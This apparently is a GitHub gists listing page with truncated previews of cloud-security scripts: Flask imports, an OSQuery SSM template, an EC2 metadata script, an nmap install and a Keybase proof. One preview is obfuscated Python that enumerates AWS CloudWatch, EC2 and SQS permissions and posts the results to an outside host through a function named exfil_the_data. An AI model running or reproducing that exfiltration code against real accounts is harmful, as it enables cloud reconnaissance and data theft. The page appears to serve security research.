This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
from flask import Flask | |
from flask_cors import CORS | |
from flask_graphql import GraphQLView | |
from flask_restful import Api | |
from graphene import Schema | |
from cis_profile_retrieval_service.common import get_config | |
from cis_profile_retrieval_service.common import initialize_vault | |
from cis_profile_retrieval_service.common import seed | |
from cis_profile_retrieval_service.schema import Query |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
AWSTemplateFormatVersion: "2010-09-09" | |
Description: "Template to create SSM Document to add OSQuery to a box." | |
Resources: | |
LinuxInstallOSQueryDocumentCommand: | |
Type: AWS::SSM::Document | |
Properties: | |
Content: | |
schemaVersion: "2.2" | |
description: Run rpm to bootstrap OSQuery onto a system (requires internet gateway). | |
mainSteps: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
#!/bin/bash | |
# Make sure it runs as root | |
[[ $UID == 0 || $EUID == 0 ]] || ( | |
echo "Must be root!" | |
exit 1 | |
) || exit 1 | |
# Default variables | |
INSTANCE_ID=$(curl -s http://169.254.169.254/latest/meta-data/instance-id) |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
import botocore | |
import boto3 | |
import json | |
import os | |
import time | |
import uuid | |
try: | |
import urllib2 | |
except: |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
(lambda __print, __g, __contextlib, __y: [[[[[[(lambda __out: (lambda __ctx: [__ctx.__enter__(), __ctx.__exit__(None, None, None), __out[0](lambda: ('\nChecks to run if the environment is AWS.\n\nlogs:CreateLogGroup\nlogs:CreateLogStream\nlogs:PutLogEvents\nec2:DescribeTags\nsqs:ListQueues\nsqs:PutMessage\n\n', [[[[[[[[[[(lambda __after: (json.dumps(check_cloudwatch()), (exfil_the_data(json.dumps(check_cloudwatch())), (exfil_the_data(json.dumps(check_ec2())), (exfil_the_data(json.dumps(check_sqs())), __after())[1])[1])[1])[1] if (__name__ == '__main__') else __after())(lambda: None) for __g['exfil_the_data'], exfil_the_data.__name__ in [(lambda data: (lambda __l: [[[[[[(__print(__l['response']), None)[1] for __l['response'] in [(urllib2.urlopen(__l['req']))]][0] for __l['req'] in [(urllib2.Request('http://{EXFIL_IP}/'.format(EXFIL_IP=__l['exfil_ip']), data=__l['data'], headers=__l['headers']))]][0] for __l['headers'] in [({'Content-Type': 'application/json'})]][0] for __l['data'] in [(__l['data'].encode('utf- |
This file contains bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
apt-get update -y | |
apt-get install nmap -y |
I hereby claim:
- I am andrewkrug on github.
- I am andrewkrug (https://keybase.io/andrewkrug) on keybase.
- I have a public key ASBVwj9dJk9VZ0cPMEA4TLbWp-dqLAqDMNBdJhihDy0YqAo
To claim this, I am signing this object: